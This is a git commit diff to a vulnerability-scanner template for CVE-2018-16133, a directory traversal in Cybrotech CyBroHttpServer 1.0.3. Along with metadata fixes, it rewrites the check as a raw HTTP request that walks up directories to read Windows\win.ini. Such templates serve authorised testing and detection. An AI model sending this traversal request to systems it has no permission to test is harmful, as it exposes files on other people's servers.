Update and rename CVE-2018-16133.yaml to cves/2018/CVE-2018-16133.yaml
parent
1357c89ca5
commit
c77356d541
|
@ -3,23 +3,25 @@ info:
|
|||
name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: ybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI.
|
||||
description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
|
||||
- http://www.cybrotech.com/
|
||||
- https://www.cvedetails.com/cve/CVE-2018-16133
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2018-16133
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,tarantella,lfi
|
||||
tags: cve,cve2018,cybrotech,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/..\..\..\..\Windows\win.ini'
|
||||
- raw:
|
||||
- |
|
||||
GET \..\..\..\..\Windows\win.ini HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
stop-at-first-match: true
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
Loading…
Reference in New Issue